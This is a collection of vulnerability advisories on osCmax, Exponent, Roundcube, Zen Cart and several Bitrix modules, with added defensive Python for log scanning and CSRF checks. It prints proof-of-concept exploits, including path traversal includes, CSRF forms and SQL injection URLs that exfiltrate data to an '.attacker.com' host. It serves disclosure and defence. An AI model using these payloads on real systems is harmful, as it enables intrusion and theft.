exploited by a remote non-authenticated attacker via a CSRF attack vector, to 
which the application is also vulnerable. 

1) Remote Code Execution via PHP File Inclusion in osCmax

1.1 The vulnerability exists due to insufficient filtration of the "pm_filename" 
HTTP POST parameter in the "/admin/page_modules_configuration.php" PHP script. A 
remote authenticated attacker can use path traversal sequences (e.g. "../../") 
to include and execute a PHP file from an arbitrary location on the local file 
system. 

A simple CSRF exploit below can be used to store the path to the "/tmp/file" 
file (or any other file containing malicious PHP code) in the application 
database:


<form action="http://[host]/admin/page_modules_configuration.php?page=1&action=insert" method="post" name="main">
<!-- hidden input fields (including the "pm_filename" value) not preserved in this copy -->
</form>
<script>document.main.submit();</script>


The code from the "/tmp/file" file will be executed once the victim visits the 
following URL: http://[host]/index.php


1.2 The second vulnerability exists due to insufficient filtration of the 
"file_type" HTTP POST parameter in the "/admin/batch_print.php" script. A remote 
authenticated attacker can use path traversal to load and execute a PHP file 
from an arbitrary location on the local filesystem. 

A simple CSRF exploit below can be used to execute PHP code from "/tmp/file" 
file:


<form action="http://[host]/admin/batch_print.php?act=1" method="post" name="main">
<!-- hidden input field (the "file_type" value) not preserved in this copy -->
</form>
<script>document.main.submit();</script>


The malicious PHP code will be executed on the server once the victim visits 
the page with above-mentioned CSRF exploit.

---

Solution:

Disclosure timeline:
2015-12-21 Vendor notified via emails, no reply.
2016-01-06 Vendor notified via emails and forum, no reply.
2016-01-13 Fix Requested via emails, no reply.
2016-01-19 Fix Requested via emails, no reply.
2016-01-20 Fix Requested via emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

---

References:

[1] High-Tech Bridge Advisory HTB23285 - 
https://www.htbridge.com/advisory/HTB23285 - RCE via CSRF in osCmax
[2] osCmax - http://oscmax.com/ - osCmax is a powerful e-commerce/shopping cart 
web application. osCmax has all the features needed to run a successful 
internet store and can be customized to whatever configuration you need.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by 
High-Tech Bridge for on-demand and continuous web application security, 
vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL 
implementation for PCI DSS and NIST compliance. Supports all types of protocols.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



BFS-SA-2016-001: FireEye Detection Evasion and Whitelisting of Arbitrary Malware

2016-02-15 Thread Blue Frost Security Research Lab


Vendor: FireEye, https://www.fireeye.com
Affected Product:   FireEye FX, AX, NX, EX
Affected Version:   FX < 7.5.1, AX < 7.7.0, NX < 7.6.1, EX < 7.6.2
Severity:   High
Title:  Detection Evasion and Whitelisting of Arbitrary Malware


An analysis engine evasion was identified which allows an attacker to
completely bypass FireEye's virtualization-based dynamic analysis on Windows
and add arbitrary binaries to the internal white list of binaries for which
the analysis will be skipped until the white list entry is wiped after a day.

This effectively allows an attacker to simply whitelist a binary before using
it in a targeted attack without fear of detection.

FireEye has released software updates to address the issue. The full advisory
with technical details is available at the following link:

https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-001/



Remote Code Execution in Exponent

2016-02-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23290
Product: Exponent
Vendor: http://www.exponentcms.org/
Vulnerable Version(s): 2.3.7 and probably prior
Tested Version: 2.3.7
Advisory Publication:  January 13, 2016  [without technical details]
Vendor Notification: January 13, 2016 
Vendor Patch: January 23, 2016 
Public Disclosure: February 3, 2016 
Vulnerability Type: Code Injection [CWE-94]
CVE Reference: CVE-2016-2242
Risk Level: Critical 
CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical vulnerability in 
Exponent CMS, which can be exploited to inject and execute arbitrary PHP code 
on the vulnerable system with the privileges of the web server. 

The vulnerability resides within the "/install/index.php" script when handling 
user input passed via the "sc" HTTP POST parameter. The script is not deleted 
by default after installation of the web application. A remote unauthenticated 
attacker can permanently inject arbitrary PHP code into the 
"/framework/conf/config.php" configuration file and execute it with the 
privileges of the web server. 

The attacker will be able to run arbitrary system commands, gain complete 
control over the vulnerable website, its databases and even compromise the 
entire web server.

A simple exploit below will modify the "/framework/conf/config.php" file and 
inject a simple web shell into it:


<form action="http://[host]/install/index.php" method="post" name="main">
<!-- hidden input fields (including the "sc" payload) not preserved in this copy -->
</form>

After successful PHP code injection, the attacker can execute arbitrary system 
commands via the web shell. 

The following example will display output of "/bin/ls" command for the current 
directory:

http://[host]/index.php?,%27=ls

---

Solution:

Apply Patch #3 to Exponent CMS v2.3.7

More Information:
https://exponentcms.lighthouseapp.com/projects/61783-exponent-cms/tickets/1345-exponent-security-vulnerability-notification
http://www.exponentcms.org/news/security-notice-closing-an-exponent-security-vulnerability
http://www.exponentcms.org/news/patch-3-released-for-v2-3-7

---

References:

[1] High-Tech Bridge Advisory HTB23290 - 
https://www.htbridge.com/advisory/HTB23290 - Remote Code Execution in Exponent
[2] Exponent - http://www.exponentcms.org/ - Exponent is a website content 
management system (or CMS) that allows site owners to easily create and manage 
dynamic websites without necessarily directly coding web pages, or managing 
site navigation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Remote Code Execution in Roundcube

2016-01-14 Thread High-Tech Bridge Security Research
Advisory ID: HTB23283
Product: Roundcube
Vendor: Roundcube.net
Vulnerable Version(s): 1.1.3 and probably prior
Tested Version: 1.1.3
Advisory Publication:  December 21, 2015  [without technical details]
Vendor Notification: December 21, 2015 
Vendor Patch: December 26, 2015 
Public Disclosure: January 13, 2016 
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2015-8770
Risk Level: Medium 
CVSSv3 Base Score: 5.3 [CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a path traversal 
vulnerability in the popular webmail client Roundcube. The vulnerability can be 
exploited to gain access to sensitive information and, under certain 
circumstances, to execute arbitrary code and totally compromise the vulnerable 
server.

The vulnerability exists due to insufficient sanitization of the "_skin" HTTP 
POST parameter in the "/index.php" script when switching between skins of the 
web application. A remote authenticated attacker can use path traversal 
sequences (e.g. "../../") to load a new skin from an arbitrary location on the 
system that is readable by the web server. 

A simple exploit below will send an HTTP POST request to the vulnerable script 
and load a new skin from the "/tmp" folder:


<form action="http://[HOST]/" method="post" name="main">
<!-- hidden input fields (including the "_skin" value) not preserved in this copy -->
</form>

Exploitation of the vulnerability requires valid user credentials and the 
ability to create files on the vulnerable host. 

Using a specially crafted skin for Roundcube, a remote attacker can gain access 
to potentially sensitive information. The following code in the skin files 
would display the database access credentials:



When the "skin_include_php" parameter is set to true, the attacker will be able 
to execute arbitrary PHP code from the skin files:

$config['skin_include_php'] = true;

This vulnerability is difficult to exploit since it requires the ability to 
create files on the web server and a valid Roundcube account. But this situation 
is very common on shared hosting servers that host clients' websites on the same 
server as Roundcube. 

---

Solution:

Update to Roundcube 1.1.4

https://roundcube.net/news/2015/12/26/updates-1.1.4-and-1.0.8-released/

---

References:

[1] High-Tech Bridge Advisory HTB23283 - 
https://www.htbridge.com/advisory/HTB23283 - RCE in Roundcube
[2] Roundcube - https://roundcube.net/ - Free and Open Source Webmail Software
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module

2016-01-14 Thread High-Tech Bridge Security Research
Advisory ID: HTB23279
Product: mcart.xls Bitrix module
Vendor: www.mcart.ru
Vulnerable Version(s): 6.5.2 and probably prior
Tested Version: 6.5.2
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Public Disclosure: January 13, 2016 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-8356
Risk Level: Medium 
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple SQL Injection 
vulnerabilities in the mcart.xls Bitrix module, which can be exploited to 
execute arbitrary SQL queries, obtain potentially sensitive data, modify 
information in the database and gain complete control over the vulnerable 
website.

All discovered vulnerabilities require that the attacker is authenticated to 
the website and has access to the vulnerable module. However, the 
vulnerabilities can also be exploited via a CSRF vector, since the web 
application does not check the origin of received requests. This means that a 
remote anonymous attacker can create a page with a CSRF exploit, trick a victim 
into visiting this page and execute arbitrary SQL queries in the database of 
the vulnerable website. 

1. Input passed via the "xls_profile" HTTP GET parameter to the 
"/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before 
being used in an SQL query. A remote authenticated attacker can manipulate SQL 
queries by injecting arbitrary SQL code.

The PoC code below is based on the DNS exfiltration technique and can be used 
if the database of the vulnerable application is hosted on a Windows system. 
The PoC makes the database server send a DNS request for a subdomain of 
".attacker.com" (a domain whose DNS server is controlled by the attacker) named 
after the output of `version()` (or any other sensitive value from the 
database):

http://[host]/bitrix/admin/mcart_xls_import.php?del_prof_real=1_profile=%27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114+--+

2. Input passed via the "xls_profile" HTTP GET parameter to the 
"/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before 
being used in an SQL query. A remote authenticated attacker can manipulate SQL 
queries by injecting arbitrary SQL code.

The simple exploit below writes the "" string into the 
"/var/www/file.php" file:

http://[host]/bitrix/admin/mcart_xls_import.php?xls_profile=%27%20UNION%20SELECT%201,%27%3C?%20phpinfo%28%29;%20?%3E%27,3,4,5,6,7,8,9,0%20INTO%20OUTFILE%20%27/var/www/file.php%27%20--%202

Successful exploitation requires that the file "/var/www/file.php" is writable 
by the MySQL system account.

3. Input passed via the "xls_iblock_id", "xls_iblock_section_id", "firstRow", 
"titleRow", "firstColumn", "highestColumn", "sku_iblock_id" and 
"xls_iblock_section_id_new" HTTP GET parameters to the 
"/bitrix/admin/mcart_xls_import_step_2.php" script is not properly sanitised 
before being used in SQL queries. A remote authenticated attacker can 
manipulate SQL queries by injecting arbitrary SQL code.

Below is a list of exploits, one for each vulnerable parameter. The exploits 
are based on the DNS exfiltration technique and can be used if the database of 
the vulnerable application is hosted on a Windows system. Each PoC makes the 
database server send a DNS request for a subdomain of ".attacker.com" (a 
domain whose DNS server is controlled by the attacker) named after the output 
of `version()` (or any other sensitive value from the database):

"xls_iblock_id":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y_translit_code=Y_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114%29+--+_iblock_section_id=0_IDENTIFY=0=0=0=0=0_GLOBALS=0_iblock_id=1_link_code=1_iblock_section_id_new=0

"xls_iblock_section_id":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y_translit_code=Y_iblock_id=0_iblock_section_id=0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114%29+--+_IDENTIFY=0=0=0=0=0_

RCE in Zen Cart via Arbitrary File Inclusion

2015-12-16 Thread High-Tech Bridge Security Research
Advisory ID: HTB23282
Product: Zen Cart
Vendor: Zen Ventures, LLC
Vulnerable Version(s): 1.5.4
Tested Version: 1.5.4
Advisory Publication:  November 25, 2015  [without technical details]
Vendor Notification: November 25, 2015 
Vendor Patch: November 26, 2015 
Public Disclosure: December 16, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8352
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical vulnerability in 
the popular e-commerce software Zen Cart, which can be exploited by remote 
non-authenticated attackers to compromise the vulnerable system. A remote 
unauthenticated attacker may be able to execute arbitrary PHP code on the 
target system, run arbitrary system commands, gain complete access to the 
application's database and obtain information about all website users.

The vulnerability exists due to the absence of filtering of directory traversal 
sequences in the "act" HTTP GET parameter of the "/ajax.php" script, which uses 
the parameter to include local PHP files via the 'require()' PHP function. A 
remote unauthenticated attacker can include and execute arbitrary PHP code on 
the target system with the privileges of the web server. 

The simple exploit below includes the file "/tmp/file.php" and executes its 
content:

http://[host]/ajax.php?method=1=/../../../../tmp/file


---

Solution:

Apply vendor's patch.

More Information:
https://www.zen-cart.com/showthread.php?218914-Security-Patches-for-v1-5-4-November-2015

---

References:

[1] High-Tech Bridge Advisory HTB23282 - 
https://www.htbridge.com/advisory/HTB23282 - RCE in Zen Cart via Arbitrary File 
Inclusion
[2] Zen Cart - https://www.zen-cart.com/ - Zen Cart® truly is the art of 
e-commerce; free, user-friendly, open source shopping cart software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



SQL Injection in orion.extfeedbackform Bitrix Module

2015-12-16 Thread High-Tech Bridge Security Research
Advisory ID: HTB23280
Product: orion.extfeedbackform Bitrix module
Vendor: www.orion-soft.ru
Vulnerable Version(s): 2.1.2 and probably prior
Tested Version: 2.1.2
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: December 11, 2015 
Public Disclosure: December 16, 2015 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-8355
Risk Level: Medium 
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in the 
orion.extfeedbackform Bitrix module, which can be exploited to execute 
arbitrary SQL queries, obtain potentially sensitive data, modify information in 
the database and gain complete control over the vulnerable website.

All discovered vulnerabilities require that the attacker is authenticated to 
the website and has access to the vulnerable module. However, the 
vulnerabilities can also be exploited via CSRF, since the web application does 
not check the origin of received requests. This means that a remote anonymous 
attacker can create a page with a CSRF exploit, trick a victim into visiting 
this page and execute arbitrary SQL queries in the database of the vulnerable 
website. 

The vulnerabilities exist due to insufficient filtering of input data passed 
via the "order" and "by" HTTP GET parameters to the 
"/bitrix/admin/orion.extfeedbackform_efbf_forms.php" script. A remote 
authenticated attacker can manipulate SQL queries by injecting arbitrary SQL 
code.

Below are two exploits, one for each vulnerable parameter. They are based on 
the DNS exfiltration technique and can be used if the database of the 
vulnerable application is hosted on a Windows system. Each PoC makes the 
database server send a DNS request for a subdomain of ".attacker.com" (a domain 
whose DNS server is controlled by the attacker) named after the output of 
`version()` (or any other sensitive value from the database).

"order":

http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?by=ID,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29+--+

"by":

http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?order=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29+--+
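
The request shapes in the mcart.xls and orion.extfeedbackform advisories are 
easy to spot in web server logs once the query string is decoded: load_file(), 
INTO OUTFILE, UNION SELECT, a trailing SQL comment and long CHAR() chains 
rarely appear in legitimate parameter values. The Python example below is 
added here (it is not code from the advisories or from the modules) and scans 
access-log lines modelled on those requests; it also rebuilds the text spelled 
out by a CHAR() chain, which tells an analyst which hostname a DNS exfiltration 
payload was aimed at. The log lines, IPs, timestamps and the ".attacker.com" 
hostname are constructed.

```python
"""Access-log scanner for the injection shapes described in the advisories above.

Added example, not part of the advisories or of the Bitrix modules. It decodes
each request's query string, flags MySQL file primitives (load_file, INTO
OUTFILE), UNION SELECT, trailing comment markers and long CHAR() chains, and
reconstructs the string hidden inside a CHAR() chain.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined-log style; the payloads mirror the
# request shapes shown in the advisories (IPs, times and hostnames are made up;
# the INTO OUTFILE content is a placeholder 'x' rather than the page's payload).
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Dec/2015:10:01:02 +0000] "GET /bitrix/admin/mcart_xls_import.php'
    '?del_prof_real=1&xls_profile=%27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),'
    '(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),'
    'CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),'
    'CHAR(111))))+--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Dec/2015:10:02:10 +0000] "GET /bitrix/admin/mcart_xls_import.php'
    '?xls_profile=%27%20UNION%20SELECT%201,%27x%27,3%20INTO%20OUTFILE%20%27/var/www/file.php%27%20--%202'
    ' HTTP/1.1" 200 311',
    '10.0.0.9 - - [16/Dec/2015:10:03:00 +0000] "GET /bitrix/admin/mcart_xls_import.php'
    '?xls_profile=default HTTP/1.1" 200 4021',
    '10.0.0.9 - - [16/Dec/2015:10:03:05 +0000] "GET /bitrix/admin/orion.extfeedbackform_efbf_forms.php'
    '?by=ID&order=ASC HTTP/1.1" 200 3999',
]

_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
_CHAR_CALL = re.compile(r"CHAR\s*\(\s*(\d{1,3})\s*\)", re.I)

# Each rule is applied to the *decoded* value of every query parameter.
_RULES = [
    ("load_file",    re.compile(r"\bload_file\s*\(", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("comment_tail", re.compile(r"(?:--\s|/\*)")),
    ("char_chain",   re.compile(r"(?:CHAR\s*\(\s*\d{1,3}\s*\)\s*,\s*){2,}CHAR\s*\(", re.I)),
]


def decode_char_chain(value: str) -> str:
    """Rebuild the text spelled out by CHAR(n) calls, in order of appearance."""
    return "".join(chr(int(n)) for n in _CHAR_CALL.findall(value))


def analyze_line(line: str, line_no: int = 0) -> Dict:
    """Return the findings for one log line (an empty 'findings' list means clean)."""
    m = _REQUEST.search(line)
    if not m:
        return {"line_no": line_no, "path": None, "findings": [], "decoded": ""}
    parts = urlsplit(m.group("target"))
    findings: List[str] = []
    decoded = ""
    # parse_qsl percent-decodes and turns '+' into a space, so the rules see
    # the SQL the way the database would.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, rx in _RULES:
            if rx.search(value):
                findings.append(f"{name}:{label}")
        if _CHAR_CALL.search(value):
            decoded = decode_char_chain(value)
    return {"line_no": line_no, "path": parts.path, "findings": findings, "decoded": decoded}


def scan(lines: List[str]) -> List[Dict]:
    """Analyze every line and keep only those with at least one finding."""
    hits = []
    for i, line in enumerate(lines, 1):
        report = analyze_line(line, i)
        if report["findings"]:
            hits.append(report)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["line_no"], hit["path"], hit["findings"], repr(hit["decoded"]))
```

For the first sample line the decoded CHAR() chain comes out as 
"\\.attacker.com\foo", i.e. the UNC path prefix around the `version()` value, 
which is exactly the lookup the attacker-controlled DNS server would receive. 
On the database side the same payloads are neutralised by prepared statements 
and, for the file primitives, by a restrictive MySQL secure_file_priv setting; 
the log rule is for catching attempts, not a substitute for either.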

---

Solution:

Update to orion.extfeedbackform 2.1.3

---

References:

[1] High-Tech Bridge Advisory HTB23280 - 
https://www.htbridge.com/advisory/HTB23280 - SQL Injection in 
orion.extfeedbackform Bitrix module
[2] orion.extfeedbackform - 
https://marketplace.1c-bitrix.ru/solutions/orion.extfeedbackform/ - Bitrix 
module for feedback forms.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Path Traversal via CSRF in bitrix.xscan Bitrix Module

2015-12-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23278
Product: bitrix.xscan Bitrix module
Vendor: Bitrix
Vulnerable Version(s): 1.0.3 and probably prior
Tested Version: 1.0.3
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 24, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2015-8357
Risk Level: Medium 
CVSSv3 Base Score: 4.2 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the 
bitrix.xscan Bitrix module, which is intended to discover and neutralize 
malware on the website. The vulnerability can be exploited to change the 
extension of arbitrary PHP files on the target system and gain access to 
potentially sensitive information, such as database credentials, or even make 
the whole website inaccessible.

The vulnerability exists due to the absence of filtering of directory traversal 
characters (e.g. "../") passed via the "file" HTTP GET parameter to the 
"/bitrix/admin/bitrix.xscan_worker.php" script. A remote authenticated attacker 
can upload a file with malicious contents and pass this file to the vulnerable 
script along with the name of the file to rename. As a result, the vulnerable 
script will change the extension of the given file from ".php" to ".ph_". This 
makes the web server treat the file as a text file and display its contents 
instead of executing it. 

To demonstrate the vulnerability, follow the steps below:

1) Choose an arbitrary image file and modify it by appending the eval() PHP 
function at the end of the file. This is needed because the file will be 
renamed only if it contains potentially dangerous content.
2) Upload this file using standard CMS functionality, for example as an image 
for your profile.
3) Obtain the name of the image you have uploaded. You can do this from your 
profile. In our example the image had the following path: 
"/upload/main/77f/image.jpg".
4) Construct the exploit payload from the path to the image and the file you 
want to view. As a demonstration we chose to view the contents of the 
"/bitrix/.settings.php" file, since it contains database credentials:

file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php

5) Use the following PoC code to reproduce the vulnerability:

http://[host]/admin/bitrix.xscan_worker.php?action=prison=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php;>

As a result, the vulnerable script renames "/bitrix/.settings.php" to 
"/bitrix/.settings.ph_", which makes it readable by anonymous users:

http://[host]/bitrix/.settings.ph_

Access to the vulnerable module requires administrative privileges; however, 
the vulnerability can be used by anonymous users via a CSRF vector. Steps 1-4 
do not require administrative or special privileges and can be performed by any 
user who can register at the website or upload an image. 

---

Solution:

Update to bitrix.xscan module 1.0.4

---

References:

[1] High-Tech Bridge Advisory HTB23278 - 
https://www.htbridge.com/advisory/HTB23278 - Path Traversal and CSRF in 
bitrix.xscan Bitrix Module
[2] bitrix.xscan - https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/ - 
Module for Bitrix CMS that can detect Trojans on your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



PHP File Inclusion in bitrix.mpbuilder Bitrix Module

2015-12-10 Thread High-Tech Bridge Security Research
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 25, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical 
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the 
bitrix.mpbuilder Bitrix module, which can be exploited to include and execute 
an arbitrary PHP file on the target system with the privileges of the web 
server. The attacker will be able to execute arbitrary system commands and gain 
complete control over the website.

Access to the vulnerable module requires administrative privileges; however, 
the vulnerability can be used by anonymous users via a CSRF vector.
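
Four of the advisories above (mcart.xls, orion.extfeedbackform, bitrix.xscan 
and bitrix.mpbuilder) make the same observation: the module never checks where 
a state-changing request came from, which turns an admin-only bug into one an 
anonymous attacker can trigger by luring an administrator onto a page. The 
Python example below is added here and is not code from Bitrix or from the 
modules; it shows the two checks that close that vector, an Origin/Referer 
comparison and a per-session token. Request and session objects are plain 
dicts standing in for a framework's (an assumption made so the example is 
self-contained); the site host and the sample requests are constructed.

```python
"""Server-side CSRF defence: same-origin check on Origin/Referer plus a per-session token.

Added example, not code from the Bitrix modules in the advisories above.
Requests and sessions are plain dicts (assumption for a self-contained demo).
"""
import hmac
import secrets
from typing import Dict, Optional
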